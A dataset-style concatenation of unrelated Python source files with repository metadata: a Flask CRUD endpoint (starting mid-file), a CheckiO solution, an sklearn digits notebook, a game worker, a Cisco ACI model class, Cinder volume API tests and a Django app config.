                    conn.rollback()  # no-op after a successful commit
                    conn.close()
        if rows == 1:
            return Response("logout success", mimetype="text/html", status=204)
        else:
            return Response("logout failed", mimetype="text/html", status=404)
@app.route("/api/place", methods=["GET", "POST", "PATCH", "DELETE"])
def place():
    """CRUD endpoint for places, joined with their owner's users row.

    GET    ?userId=<id>            -> list places (optionally by owner), 200
    POST   {loginToken, name}      -> create a place for the session user, 201
    PATCH  {loginToken, placeId, name} -> rename one of the user's places, 200
    DELETE {loginToken, placeId}   -> remove one of the user's places, 204
    Any database failure -> 400.
    """
    if request.method == "GET":
        user_id = request.args.get("userId")
        conn = None
        cursor = None
        place_data = None
        try:
            conn = mariadb.connect(user=dbcreds.user, password=dbcreds.password, host=dbcreds.host, port=dbcreds.port, database=dbcreds.database)
            cursor = conn.cursor()
            if user_id:
                cursor.execute("SELECT * FROM users u INNER JOIN place p ON u.id = p.user_id WHERE u.id = ?", [user_id])
            else:
                cursor.execute("SELECT * FROM users u INNER JOIN place p ON u.id = p.user_id")
            # Bug fix: the filtered query used to store its rows in an unused
            # t_data variable, so GET with userId always returned 400.
            place_data = cursor.fetchall()
        except Exception as e:
            print(e)
        finally:
            if cursor is not None:
                cursor.close()
            if conn is not None:
                conn.rollback()  # no-op when nothing is uncommitted
                conn.close()
        if place_data is not None:
            place_info = []
            # Joined row layout: users columns 0-3, then place columns.
            for place_row in place_data:
                place_dic = {
                    "placeId": place_row[4],
                    "userId": place_row[0],
                    "name": place_row[5],
                    "accomodates": place_row[6],
                    "bathrooms": place_row[7],
                    "bedrooms": place_row[8],
                    "beds": place_row[9],
                    "images": place_row[10],
                    "price": place_row[13],
                    "propertyType": place_row[14],
                    "roomType": place_row[15]
                }
                place_info.append(place_dic)
            return Response(json.dumps(place_info, default=str), mimetype="application/json", status=200)
        else:
            return Response("failure", mimetype="html/text", status=400)
    if request.method == "POST":
        login_token = request.json.get("loginToken")
        name = request.json.get("name")
        conn = None
        cursor = None
        place_row = None
        try:
            conn = mariadb.connect(user=dbcreds.user, password=dbcreds.password, host=dbcreds.host, port=dbcreds.port, database=dbcreds.database)
            cursor = conn.cursor()
            # Resolve the session owner, insert the place, then re-select the
            # joined row so the response matches the GET shape.
            cursor.execute("SELECT user_id FROM user_session WHERE loginToken = ?", [login_token])
            user_id = cursor.fetchone()[0]
            cursor.execute("INSERT INTO place(user_id, name) VALUES (?,?)", [user_id, name])
            conn.commit()
            place_id = cursor.lastrowid
            cursor.execute("SELECT * FROM users u INNER JOIN place p ON u.id = p.user_id where p.id = ?", [place_id])
            place_row = cursor.fetchone()
        except Exception as e:
            print(e)
        finally:
            if cursor is not None:
                cursor.close()
            if conn is not None:
                conn.rollback()  # no-op after the successful commit
                conn.close()
        if place_row is not None:
            place_dic = {
                "placeId": place_row[4],
                "userId": place_row[0],
                "name": place_row[5],
                "accomodates": place_row[6],
                "bathrooms": place_row[7],
                "bedrooms": place_row[8],
                "beds": place_row[9],
                "images": place_row[10],
                "price": place_row[13],
                "propertyType": place_row[14],
                "roomType": place_row[15]
            }
            return Response(json.dumps(place_dic, default=str), mimetype="application/json", status=201)
        else:
            return Response("failure", mimetype="html/text", status=400)
    if request.method == "PATCH":
        login_token = request.json.get("loginToken")
        place_id = request.json.get("placeId")
        name = request.json.get("name")
        conn = None
        cursor = None
        rows = None
        try:
            conn = mariadb.connect(user=dbcreds.user, password=dbcreds.password, host=dbcreds.host, port=dbcreds.port, database=dbcreds.database)
            cursor = conn.cursor()
            cursor.execute("SELECT user_id FROM user_session WHERE loginToken = ?", [login_token])
            user_id = cursor.fetchone()[0]
            # user_id in the WHERE clause keeps users from renaming places
            # they do not own.
            cursor.execute("UPDATE place SET name = ? WHERE id=? AND user_id =?", [name, place_id, user_id])
            conn.commit()
            # NOTE(review): rowcount may be 0 when nothing matched, yet the
            # endpoint still answers 200 — confirm this is intended.
            rows = cursor.rowcount
        except Exception as e:
            print(e)
        finally:
            if cursor is not None:
                cursor.close()
            if conn is not None:
                conn.rollback()  # no-op after the successful commit
                conn.close()
        if rows is not None:
            response_dic = {
                "placeId": place_id,
                "name": name,
            }
            return Response(json.dumps(response_dic, default=str), mimetype="application/json", status=200)
        else:
            return Response("failure", mimetype="html/text", status=400)
    if request.method == "DELETE":
        login_token = request.json.get("loginToken")
        place_id = request.json.get("placeId")
        conn = None
        cursor = None
        rows = None
        try:
            conn = mariadb.connect(user=dbcreds.user, password=dbcreds.password, host=dbcreds.host, port=dbcreds.port, database=dbcreds.database)
            cursor = conn.cursor()
            cursor.execute("SELECT user_id FROM user_session WHERE loginToken = ?", [login_token])
            user_id = cursor.fetchone()[0]
            # Ownership enforced by the user_id predicate, as in PATCH.
            cursor.execute("DELETE FROM place WHERE id=? AND user_id =?", [place_id, user_id])
            conn.commit()
            rows = cursor.rowcount
        except Exception as e:
            print(e)
        finally:
            if cursor is not None:
                cursor.close()
            if conn is not None:
                conn.rollback()  # no-op after the successful commit
                conn.close()
        if rows is not None:
            return Response("Delete success", mimetype="html/text", status=204)
        else:
            return Response("failure", mimetype="html/text", status=400)
| [
"[email protected]"
] | |
81270c4b09a1d3528f7e7da50545fdb98d9f0426 | 2ade7afe274e3f6252bcfc38c17639fc31379002 | /checkio.org/Elementary/popular_words.py | fc9c1bcbd795b9b52e02106d5b35a8974fedf37e | [] | no_license | dunaldo/checkio-solutions | 78c6922efb6b7f321476be1e15d56beafe5efc8b | a8ed7ac072d43d185f95149473f0e529d41e1d6c | refs/heads/master | 2020-03-29T09:23:43.521483 | 2019-02-07T20:28:40 | 2019-02-07T20:28:40 | 149,756,023 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py | from collections import Counter
def popular_words(text, words):
    """Return a dict mapping each word in *words* to its frequency in *text*.

    Matching is case-insensitive; commas and periods are stripped before
    splitting on whitespace. Words absent from *text* map to 0, and the
    result preserves the order of *words*.
    """
    counts = Counter(text.replace(',', '').lower().replace('.', '').split())
    # Counter returns 0 for missing keys, so no explicit default is needed.
    return {word: counts[word] for word in words}
if __name__ == '__main__':
    # Demo run. The CheckiO self-check (previously kept here as commented-out
    # asserts) expects {'i': 4, 'was': 3, 'three': 0} for this sample.
    print("Example:")
    sample_text = '''
When I was One,
I had just begun.
When I was Two,
I was nearly new.
'''
    print(popular_words(sample_text, ['i', 'was', 'three']))
| [
"[email protected]"
] | |
0661e0edba59217cb141f3c37b121546ca3d25c9 | 80fd53a27d0c4b4053671a24678aeb67e7c67d04 | /Digit_recognition_sci_kit_learn_Test.py | 663d288c8a26a91d2bb193c7cec6ed1fd83bd111 | [] | no_license | S-shubham/Sci_Kit_learn- | 39b065d03b99b52823b9d0aa69ca9406ac6d322a | 9d1a98ee79b2913be5f8606175b58dff0dd4b2ea | refs/heads/master | 2020-04-03T05:46:06.644526 | 2018-11-26T07:49:54 | 2018-11-26T07:49:54 | 155,055,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | #!/usr/bin/env python
# coding: utf-8
# Script exported from a Jupyter notebook; the "In[...]" markers are the
# original cell boundaries. Trains an SVM on the sklearn digits dataset.

# In[1]:
# Leftover scratch cell from the notebook — evaluates to 5, no effect here.
2+3

# In[3]:
from sklearn import datasets as ds

# In[5]:
# Load the bundled 8x8 handwritten-digits dataset.
digit=ds.load_digits()

# In[6]:
from sklearn import svm

# In[7]:
# Support-vector classifier; gamma/C values follow the sklearn tutorial.
clf=svm.SVC(gamma=0.001,C=100.)

# In[10]:
# Train on every sample except the last one, which is held out below.
clf.fit(digit.data[:-1],digit.target[:-1])

# In[12]:
# Predict the held-out sample (the notebook displayed this expression).
clf.predict(digit.data[-1:])

# In[14]:
# True label of the held-out sample, for comparison with the prediction.
digit.target[-1:]

# In[ ]:
| [
"[email protected]"
] | |
57adbfd2865b7cf8540897ff6ca3685bbaf4dfb0 | 164457b943d0b426e9a5e2eb57779e4e37f2d1bb | /the_tale/accounts/workers/accounts_manager.py | 84d4482f67e8a0b8ffab01b81c7cb415dffd6c34 | [
"BSD-2-Clause-Views"
] | permissive | lshestov/the-tale | 64334fd99a442ad736d9e8a38e8f0fb52d0ebab6 | 6229edfec6420307975269be9926c68ecdefb930 | refs/heads/master | 2021-01-18T08:38:44.147294 | 2015-10-27T18:43:10 | 2015-10-27T18:43:10 | 50,228,827 | 0 | 0 | null | 2016-01-23T07:38:54 | 2016-01-23T07:38:54 | null | UTF-8 | Python | false | false | 3,166 | py | # coding: utf-8
import time
import datetime
from dext.settings import settings
from the_tale.common.utils.workers import BaseWorker
from the_tale.common import postponed_tasks
from the_tale.accounts.prototypes import AccountPrototype, RandomPremiumRequestPrototype
from the_tale.accounts.conf import accounts_settings
class Worker(BaseWorker):
    """Accounts-manager background worker.

    When idle it runs two periodic jobs (premium-expiry notifications and
    random-premium-request processing); otherwise it services the queued
    commands 'task', 'run_account_method' and 'stop'.
    """
    # Seconds to wait for a queued command before process_no_cmd() runs.
    GET_CMD_TIMEOUT = 60

    def clean_queues(self):
        """Purge the base queues plus this worker's private stop queue."""
        super(Worker, self).clean_queues()
        self.stop_queue.queue.purge()

    def initialize(self):
        """Mark the worker ready and reset leftover postponed tasks."""
        self.initialized = True
        postponed_tasks.PostponedTaskPrototype.reset_all()
        self.logger.info('ACCOUNT_MANAGER INITIALIZED')

    def process_no_cmd(self):
        # Idle tick. Send premium-expiry notifications at most once per
        # ~23.5 hours and only inside the configured one-hour window;
        # otherwise drain pending random-premium requests.
        # (The settings key stores a unix timestamp as a string; the
        # 'PREIMIUM' spelling is part of the persisted key name.)
        if (time.time() - float(settings.get(accounts_settings.SETTINGS_PREV_PREIMIUM_EXPIRED_NOTIFICATION_RUN_TIME_KEY, 0)) > 23.5*60*60 and
            accounts_settings.PREMIUM_EXPIRED_NOTIFICATION_RUN_TIME <= datetime.datetime.now().hour <= accounts_settings.PREMIUM_EXPIRED_NOTIFICATION_RUN_TIME+1):
            settings[accounts_settings.SETTINGS_PREV_PREIMIUM_EXPIRED_NOTIFICATION_RUN_TIME_KEY] = str(time.time())
            self.run_send_premium_expired_notifications()
            return
        self.run_random_premium_requests_processing()

    def run_send_premium_expired_notifications(self):
        """Delegate the notification sweep to AccountPrototype."""
        AccountPrototype.send_premium_expired_notifications()

    def run_random_premium_requests_processing(self):
        # Drain unprocessed requests one at a time; stop on the first
        # failure or when the queue is empty.
        while True:
            request = RandomPremiumRequestPrototype.get_unprocessed()
            if request is None:
                return
            self.logger.info('process random premium request %d' % request.id)
            if not request.process():
                self.logger.info('request %d not processed' % request.id)
                return
            else:
                self.logger.info('request %d processed' % request.id)

    def cmd_task(self, task_id):
        """Enqueue a 'task' command (handled by process_task)."""
        return self.send_cmd('task', {'task_id': task_id})

    def process_task(self, task_id):
        """Run one postponed task and its post-save actions."""
        task = postponed_tasks.PostponedTaskPrototype.get_by_id(task_id)
        task.process(self.logger)
        task.do_postsave_actions()

    def cmd_run_account_method(self, account_id, method_name, data):
        """Enqueue a method call on an account (handled below)."""
        return self.send_cmd('run_account_method', {'account_id': account_id,
                                                    'method_name': method_name,
                                                    'data': data})

    def process_run_account_method(self, account_id, method_name, data):
        # Invoke an arbitrary account method by name and persist the result.
        if account_id is not None:
            account = AccountPrototype.get_by_id(account_id)
            getattr(account, method_name)(**data)
            account.save()
        else:
            # here we can process classmethods, if they appear in future
            pass

    def cmd_stop(self):
        """Enqueue the 'stop' command."""
        return self.send_cmd('stop')

    def process_stop(self):
        # Acknowledge shutdown on the stop queue so the supervisor can join.
        self.initialized = False
        self.stop_required = True
        self.stop_queue.put({'code': 'stopped', 'worker': 'accounts_manager'}, serializer='json', compression=None)
        self.logger.info('ACCOUNTS MANAGER STOPPED')
| [
"[email protected]"
] | |
ac47410c081854dcc9bc0251f7925ae5e152c61f | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/fv/poddhcpserverinfo.py | 578744b8cd584e1c2bc24ce6e7cb39c73bd5bc04 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 7,213 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class PodDhcpServerInfo(Mo):
    """DHCP-server information for the current POD (fv:PodDhcpServerInfo).

    Auto-generated Cisco ACI cobra model class: the class body only
    populates the ClassMeta/PropMeta tables that the cobra runtime
    introspects. Regenerated from ACI metadata — do not hand-edit logic.
    """
    meta = ClassMeta("cobra.model.fv.PodDhcpServerInfo")

    # --- class-level metadata (naming, access, containment) ---
    meta.moClassName = "fvPodDhcpServerInfo"
    meta.rnFormat = "podDhcpServerInfo-%(nodeId)s"
    meta.category = MoCategory.REGULAR
    meta.label = "Dhcp Server info of the current POD"
    meta.writeAccessMask = 0x1
    meta.readAccessMask = 0x1
    meta.isDomainable = False
    meta.isReadOnly = True
    meta.isConfigurable = False
    meta.isDeletable = False
    meta.isContextRoot = False

    meta.childClasses.add("cobra.model.fault.Inst")
    meta.childClasses.add("cobra.model.fault.Counts")
    meta.childClasses.add("cobra.model.health.Inst")
    meta.childClasses.add("cobra.model.fault.Delegate")

    meta.childNamesAndRnPrefix.append(("cobra.model.fault.Counts", "fltCnts"))
    meta.childNamesAndRnPrefix.append(("cobra.model.fault.Inst", "fault-"))
    meta.childNamesAndRnPrefix.append(("cobra.model.health.Inst", "health"))
    meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))

    meta.parentClasses.add("cobra.model.fv.PodConnPDef")

    meta.superClasses.add("cobra.model.naming.NamedObject")
    meta.superClasses.add("cobra.model.pol.Obj")
    meta.superClasses.add("cobra.model.pol.Def")

    meta.rnPrefixes = [
        ('podDhcpServerInfo-', True),
    ]

    # --- property definitions ---
    prop = PropMeta("str", "PodDhcpServerDn", "PodDhcpServerDn", 47391, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("PodDhcpServerDn", prop)

    prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("deleteAll", "deleteall", 16384)
    prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
    prop._addConstant("ignore", "ignore", 4096)
    meta.props.add("childAction", prop)

    prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
    prop.label = "Description"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("descr", prop)

    prop = PropMeta("str", "dhcpIssues", "dhcpIssues", 47392, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "none"
    prop._addConstant("incorrect-pod-dhcp-server-configuration", "nodeid-of-fabricpoddhcpserver-configured-is-not-a-vtor", 1)
    prop._addConstant("none", "none", 0)
    meta.props.add("dhcpIssues", prop)

    prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
    prop.label = "None"
    prop.isDn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("dn", prop)

    prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "local"
    prop._addConstant("implicit", "implicit", 4)
    prop._addConstant("local", "local", 0)
    prop._addConstant("policy", "policy", 1)
    prop._addConstant("replica", "replica", 2)
    prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
    meta.props.add("lcOwn", prop)

    prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "never"
    prop._addConstant("never", "never", 0)
    meta.props.add("modTs", prop)

    prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
    prop.label = "Name"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 64)]
    prop.regex = ['[a-zA-Z0-9_.:-]+']
    meta.props.add("name", prop)

    prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
    prop.label = "Name alias"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 63)]
    prop.regex = ['[a-zA-Z0-9_.-]+']
    meta.props.add("nameAlias", prop)

    # nodeId is the naming property (appears in the RN format above).
    prop = PropMeta("str", "nodeId", "nodeId", 44472, PropCategory.REGULAR)
    prop.label = "node id of Dhcp server"
    prop.isConfig = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    prop.isNaming = True
    prop.range = [(1, 16000)]
    prop.defaultValue = 1
    prop.defaultValueStr = "1"
    meta.props.add("nodeId", prop)

    prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
    prop.label = "None"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("ownerKey", prop)

    prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
    prop.label = "None"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 64)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("ownerTag", prop)

    prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
    prop.label = "None"
    prop.isRn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("rn", prop)

    prop = PropMeta("str", "serverType", "serverType", 44473, PropCategory.REGULAR)
    prop.label = "Dhcp server Type Primary/Secondary"
    prop.isConfig = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    prop.defaultValue = 0
    prop.defaultValueStr = "unspecified"
    prop._addConstant("primary", "primary", 1)
    prop._addConstant("secondary", "secondary", 2)
    prop._addConstant("unspecified", "unspecified", 0)
    meta.props.add("serverType", prop)

    prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("created", "created", 2)
    prop._addConstant("deleted", "deleted", 8)
    prop._addConstant("modified", "modified", 4)
    meta.props.add("status", prop)

    meta.namingProps.append(getattr(meta.props, "nodeId"))

    def __init__(self, parentMoOrDn, nodeId, markDirty=True, **creationProps):
        # nodeId is the single naming value used to build this MO's RN/DN.
        namingVals = [nodeId]
        Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
7ad34a71cf548ff1303f903e8c1a5ba7ad27e6e8 | 631b074ba6b901ba5fb709f8e24acb84a596e777 | /cinder/tests/api/openstack/volume/test_volumes.py | 9563989a91bfa3d21b06cacf38d01659d5bf1120 | [
"Apache-2.0"
] | permissive | matiu2/cinder | 5ee188a834eea06883103ab97cee50a9ee3a21bb | 1c52fb3041df5661756246705942c60b4b1448d5 | refs/heads/master | 2021-01-18T13:54:34.159533 | 2012-05-04T04:45:20 | 2012-05-04T04:45:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,490 | py | # Copyright 2013 Josh Durgin
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from lxml import etree
import webob
from cinder.api.openstack.volume import volumes
from cinder import flags
from cinder import test
from cinder.tests.api.openstack import fakes
from cinder.volume import api as volume_api
FLAGS = flags.FLAGS
# XML namespace used by the v1 volume serializers; serialized element tags
# are '{uri}localname', i.e. NS + <local-name>.
NS = '{http://docs.openstack.org/volume/api/v1}'
class VolumeApiTest(test.TestCase):
    """Tests for the v1 /volumes controller (create/list/show/delete)."""

    def setUp(self):
        super(VolumeApiTest, self).setUp()
        self.controller = volumes.VolumeController()
        # Stub the volume API so no real driver or database is touched.
        self.stubs.Set(volume_api.API, 'get_all', fakes.stub_volume_get_all)
        self.stubs.Set(volume_api.API, 'get', fakes.stub_volume_get)
        self.stubs.Set(volume_api.API, 'delete', fakes.stub_volume_delete)

    def test_volume_create(self):
        self.stubs.Set(volume_api.API, "create", fakes.stub_volume_create)

        vol = {"size": 100,
               "display_name": "Volume Test Name",
               "display_description": "Volume Test Desc",
               "availability_zone": "zone1:host1"}
        body = {"volume": vol}
        req = fakes.HTTPRequest.blank('/v1/volumes')
        res_dict = self.controller.create(req, body)
        expected = {'volume': {'status': 'fakestatus',
                               'display_description': 'Volume Test Desc',
                               'availability_zone': 'zone1:host1',
                               'display_name': 'Volume Test Name',
                               'attachments': [{'device': '/',
                                                'server_id': 'fakeuuid',
                                                'id': '1',
                                                'volume_id': '1'}],
                               'volume_type': 'vol_type_name',
                               'snapshot_id': None,
                               'metadata': {},
                               'id': '1',
                               'created_at': datetime.datetime(1, 1, 1,
                                                               1, 1, 1),
                               'size': 100}}
        self.assertEqual(res_dict, expected)

    def test_volume_create_no_body(self):
        body = {}
        req = fakes.HTTPRequest.blank('/v1/volumes')
        self.assertRaises(webob.exc.HTTPUnprocessableEntity,
                          self.controller.create,
                          req,
                          body)

    def test_volume_list(self):
        req = fakes.HTTPRequest.blank('/v1/volumes')
        res_dict = self.controller.index(req)
        expected = {'volumes': [{'status': 'fakestatus',
                                 'display_description': 'displaydesc',
                                 'availability_zone': 'fakeaz',
                                 'display_name': 'displayname',
                                 'attachments': [{'device': '/',
                                                  'server_id': 'fakeuuid',
                                                  'id': '1',
                                                  'volume_id': '1'}],
                                 'volume_type': 'vol_type_name',
                                 'snapshot_id': None,
                                 'metadata': {},
                                 'id': '1',
                                 'created_at': datetime.datetime(1, 1, 1,
                                                                 1, 1, 1),
                                 'size': 1}]}
        self.assertEqual(res_dict, expected)

    def test_volume_list_detail(self):
        req = fakes.HTTPRequest.blank('/v1/volumes/detail')
        # Bug fix: this test previously called index(), so the detail action
        # was never exercised; the detail view returns the same fields here.
        res_dict = self.controller.detail(req)
        expected = {'volumes': [{'status': 'fakestatus',
                                 'display_description': 'displaydesc',
                                 'availability_zone': 'fakeaz',
                                 'display_name': 'displayname',
                                 'attachments': [{'device': '/',
                                                  'server_id': 'fakeuuid',
                                                  'id': '1',
                                                  'volume_id': '1'}],
                                 'volume_type': 'vol_type_name',
                                 'snapshot_id': None,
                                 'metadata': {},
                                 'id': '1',
                                 'created_at': datetime.datetime(1, 1, 1,
                                                                 1, 1, 1),
                                 'size': 1}]}
        self.assertEqual(res_dict, expected)

    def test_volume_show(self):
        req = fakes.HTTPRequest.blank('/v1/volumes/1')
        res_dict = self.controller.show(req, 1)
        expected = {'volume': {'status': 'fakestatus',
                               'display_description': 'displaydesc',
                               'availability_zone': 'fakeaz',
                               'display_name': 'displayname',
                               'attachments': [{'device': '/',
                                                'server_id': 'fakeuuid',
                                                'id': '1',
                                                'volume_id': '1'}],
                               'volume_type': 'vol_type_name',
                               'snapshot_id': None,
                               'metadata': {},
                               'id': '1',
                               'created_at': datetime.datetime(1, 1, 1,
                                                               1, 1, 1),
                               'size': 1}}
        self.assertEqual(res_dict, expected)

    def test_volume_show_no_attachments(self):
        def stub_volume_get(self, context, volume_id):
            return fakes.stub_volume(volume_id, attach_status='detached')

        self.stubs.Set(volume_api.API, 'get', stub_volume_get)

        req = fakes.HTTPRequest.blank('/v1/volumes/1')
        res_dict = self.controller.show(req, 1)
        expected = {'volume': {'status': 'fakestatus',
                               'display_description': 'displaydesc',
                               'availability_zone': 'fakeaz',
                               'display_name': 'displayname',
                               'attachments': [],
                               'volume_type': 'vol_type_name',
                               'snapshot_id': None,
                               'metadata': {},
                               'id': '1',
                               'created_at': datetime.datetime(1, 1, 1,
                                                               1, 1, 1),
                               'size': 1}}
        self.assertEqual(res_dict, expected)

    def test_volume_show_no_volume(self):
        self.stubs.Set(volume_api.API, "get", fakes.stub_volume_get_notfound)

        req = fakes.HTTPRequest.blank('/v1/volumes/1')
        self.assertRaises(webob.exc.HTTPNotFound,
                          self.controller.show,
                          req,
                          1)

    def test_volume_delete(self):
        req = fakes.HTTPRequest.blank('/v1/volumes/1')
        resp = self.controller.delete(req, 1)
        self.assertEqual(resp.status_int, 202)

    def test_volume_delete_no_volume(self):
        self.stubs.Set(volume_api.API, "get", fakes.stub_volume_get_notfound)

        req = fakes.HTTPRequest.blank('/v1/volumes/1')
        self.assertRaises(webob.exc.HTTPNotFound,
                          self.controller.delete,
                          req,
                          1)
class VolumeSerializerTest(test.TestCase):
    """Tests for the XML serializers of the v1 volume views."""

    def _verify_volume_attachment(self, attach, tree):
        # Every attachment field must be serialized as a string attribute.
        for attr in ('id', 'volume_id', 'server_id', 'device'):
            self.assertEqual(str(attach[attr]), tree.get(attr))

    def _verify_volume(self, vol, tree):
        self.assertEqual(tree.tag, NS + 'volume')
        for attr in ('id', 'status', 'size', 'availability_zone', 'created_at',
                     'display_name', 'display_description', 'volume_type',
                     'snapshot_id'):
            self.assertEqual(str(vol[attr]), tree.get(attr))
        for child in tree:
            self.assertTrue(child.tag in (NS + 'attachments', NS + 'metadata'))
            # Bug fix: child tags are namespace-qualified, so the previous
            # comparisons against bare 'attachments'/'metadata' never matched
            # and both verification branches were dead code.
            if child.tag == NS + 'attachments':
                self.assertEqual(1, len(child))
                self.assertEqual(NS + 'attachment', child[0].tag)
                self._verify_volume_attachment(vol['attachments'][0], child[0])
            elif child.tag == NS + 'metadata':
                not_seen = set(vol['metadata'].keys())
                for gr_child in child:
                    # Strip the namespace (if present) before matching keys.
                    tag = gr_child.tag
                    if tag.startswith(NS):
                        tag = tag[len(NS):]
                    self.assertTrue(tag in not_seen)
                    self.assertEqual(str(vol['metadata'][tag]),
                                     gr_child.text)
                    not_seen.remove(tag)
                self.assertEqual(0, len(not_seen))

    def test_volume_show_create_serializer(self):
        serializer = volumes.VolumeTemplate()
        raw_volume = dict(
            id='vol_id',
            status='vol_status',
            size=1024,
            availability_zone='vol_availability',
            created_at=datetime.datetime.now(),
            attachments=[dict(
                    id='vol_id',
                    volume_id='vol_id',
                    server_id='instance_uuid',
                    device='/foo')],
            display_name='vol_name',
            display_description='vol_desc',
            volume_type='vol_type',
            snapshot_id='snap_id',
            metadata=dict(
                foo='bar',
                baz='quux',
                ),
            )
        text = serializer.serialize(dict(volume=raw_volume))

        tree = etree.fromstring(text)
        self._verify_volume(raw_volume, tree)

    def test_volume_index_detail_serializer(self):
        serializer = volumes.VolumesTemplate()
        raw_volumes = [dict(
                id='vol1_id',
                status='vol1_status',
                size=1024,
                availability_zone='vol1_availability',
                created_at=datetime.datetime.now(),
                attachments=[dict(
                        id='vol1_id',
                        volume_id='vol1_id',
                        server_id='instance_uuid',
                        device='/foo1')],
                display_name='vol1_name',
                display_description='vol1_desc',
                volume_type='vol1_type',
                snapshot_id='snap1_id',
                metadata=dict(
                    foo='vol1_foo',
                    bar='vol1_bar',
                    ),
                ),
                       dict(
                id='vol2_id',
                status='vol2_status',
                size=1024,
                availability_zone='vol2_availability',
                created_at=datetime.datetime.now(),
                attachments=[dict(
                        id='vol2_id',
                        volume_id='vol2_id',
                        server_id='instance_uuid',
                        device='/foo2')],
                display_name='vol2_name',
                display_description='vol2_desc',
                volume_type='vol2_type',
                snapshot_id='snap2_id',
                metadata=dict(
                    foo='vol2_foo',
                    bar='vol2_bar',
                    ),
                )]
        text = serializer.serialize(dict(volumes=raw_volumes))

        tree = etree.fromstring(text)
        self.assertEqual(NS + 'volumes', tree.tag)
        self.assertEqual(len(raw_volumes), len(tree))
        for idx, child in enumerate(tree):
            self._verify_volume(raw_volumes[idx], child)
| [
"[email protected]"
] | |
283ddf0cecb6580e015b84c826afada6ef5234d6 | a0f579bc6b1dd310b232982240e15b3aeda8c80f | /apps.py | 729d0bb5df7cb1ae7664be531fccf28a02613b39 | [] | no_license | megala18/task | 886e944fc1b59dbd6fbb2485a38ae4bc00dee186 | 1bbe3b27f4a42be57507b34b3fccbf04a2ae02e5 | refs/heads/main | 2023-08-18T23:39:53.532379 | 2021-10-06T10:56:01 | 2021-10-06T10:56:01 | 414,173,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | from django.apps import AppConfig
class CrudappConfig(AppConfig):
    """Django application configuration for the crudApp app."""

    name = 'crudApp'
    default_auto_field = 'django.db.models.BigAutoField'
| [
"[email protected]"
] | |
